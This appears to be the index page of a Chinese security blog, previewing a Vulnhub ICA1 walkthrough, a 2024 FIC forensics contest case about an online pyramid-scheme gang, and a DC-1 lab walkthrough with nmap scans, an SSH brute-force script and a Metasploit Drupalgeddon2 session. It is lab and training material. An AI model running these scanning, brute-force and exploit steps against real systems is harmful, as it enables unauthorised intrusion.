ICA1-Vulnhub
本机ip1192.1.1.6
靶机ip1192.1.1.18
内网探测12345678┌──(root㉿kali)-[~]└─# arp-scan -lInterface: eth0, type: EN10MB, MAC: 00:0c:29:6c:40:99, IPv4: 192.1.1.5Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)192.1.1.1 00:50:56:c0:00:08 VMware, Inc.192.1.1.2 00:50:56:e4:e9:e5 VMware, Inc.192.1.1.8 00:0c:29:f7:da:7d VMware, Inc.192.1.1.254 00:50:56:f6:b4:f4 VMware, Inc.
端口探测123456789101112131415161718192021222324252627282930313233343 ...
24FIC线下决赛
2024年弘连网络FIC大会竞赛题-0518线下决赛题案件背景:2024年3月15日凌晨,受害人短视频平台上看到一段近期火爆的交通事故视频,留言后有人通过私信联系,称有一个赚大钱的机会,该人自称李某,提议让他到他们平台充值做代理;最终受害人发现自己被卷入了一个复杂的网络传销犯罪活动中,从而报案。
经过一段时间的侦查,2023年3月25日,警方最终锁定了”lalala李”网络水军团伙的技术人员卢某,一举拿下了卢某的住所;当天上午,警方开始对卢某某的个人计算机进行现场勘验。在管理工具历史记录中,发现了大量访问某个PVE云服务器控制台的记录。初步判断该云服务器可能为该团伙网络引流的主要平台。
经过进一步追查,警方发现该PVE云服务器租用于某知名云服务商,服务器上运行着数个不同的虚拟机实例;平台通过虚拟软件模拟多部手机,利用网络水军的力量在各大平台发布伪造的图片传播负面新闻,引流受害者加入平台。
在深入分析虚拟机镜像后,警方终于发现这些虚拟机背后运行着一个复杂的网络传销平台!最终,警方展开了一场声势浩大的收网行动,成功捣毁了该犯罪团伙。案件中的主要成员李安弘、卢某某等人均被依法逮捕。
接下来, ...
DC-1靶场练习
arp扫描1arp-scan -l
nmap1nmap -sS -sV -A -n 192.168.100.31
看样子是个 Drupal 站点
111/tcp:开放的 rpcbind 服务
ssh爆破1nmap --script=ssh-brute 192.168.100.31
无果
访问80端口
msf搜索漏洞
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889msf6 > use 1[*] No payload configured, defaulting to php/meterpreter/reverse_tcpmsf6 exploit(unix/webapp/drupal_drupalgeddon2) > info Name: Drupal ...
about_me
Galaxy成员
n0wayback成员
微信🛰:xyaxxya
欢迎交流
